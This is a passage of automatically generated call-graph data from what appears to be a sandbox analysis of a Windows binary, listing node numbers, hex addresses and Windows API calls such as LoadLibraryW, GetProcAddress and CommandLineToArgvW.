68b866cc 2 API calls 3227->3229 3228->3226 3230 68b8197b 3229->3230 3231 68b866cc 2 API calls 3230->3231 3232 68b81983 FindClose 3231->3232 3232->3221 3244 68b85790 GetProcessHeap HeapAlloc 3233->3244 3235 68b8666c 3235->3120 3237 68b866f7 3236->3237 3238 68b866d6 3236->3238 3237->3127 3245 68b857e2 GetProcessHeap HeapFree 3238->3245 3246 68b85790 GetProcessHeap HeapAlloc 3240->3246 3242 68b865e7 3242->3125 3243->3217 3244->3235 3245->3237 3246->3242 3286 68b87cbb 3247->3286 3250 68b856ab 3293 68b847ce 3250->3293 3251 68b856be 3338 68b8550d 3251->3338 3254 68b856b6 3254->3168 3256 68b847ce 90 API calls 3257 68b856d5 3256->3257 3257->3254 3259 68b87b5b 3258->3259 3260 68b87be5 3258->3260 3262 68b87b69 3259->3262 3272 68b87c0c 3259->3272 3261 68b86645 2 API calls 3260->3261 3263 68b87bf1 LoadLibraryW 3261->3263 3265 68b87c3f 3262->3265 3266 68b87b77 3262->3266 3267 68b866cc 2 API calls 3263->3267 3264 68b865c0 2 API calls 3268 68b87c1d GetProcAddress 3264->3268 3265->3262 3271 68b86645 2 API calls 3265->3271 3269 68b87c70 3266->3269 3270 68b87b85 GetCommandLineW CommandLineToArgvW 3266->3270 3267->3272 3273 68b866cc 2 API calls 3268->3273 3276 68b865c0 2 API calls 3269->3276 3274 68b87cb1 3270->3274 3284 68b87bad 3270->3284 3275 68b87c50 LoadLibraryW 3271->3275 3272->3259 3272->3264 3273->3265 3274->3170 3279 68b866cc 2 API calls 3275->3279 3277 68b87c7c GetProcAddress 3276->3277 3280 68b866cc 2 API calls 3277->3280 3278 68b87ca8 LocalFree 3278->3274 3282 68b87c6b 3279->3282 3283 68b87c9e 3280->3283 3281 68b87bbd wcscmp 3281->3284 3285 68b87bdb 3281->3285 3282->3266 3283->3285 3284->3278 3284->3281 3284->3285 3285->3278 3287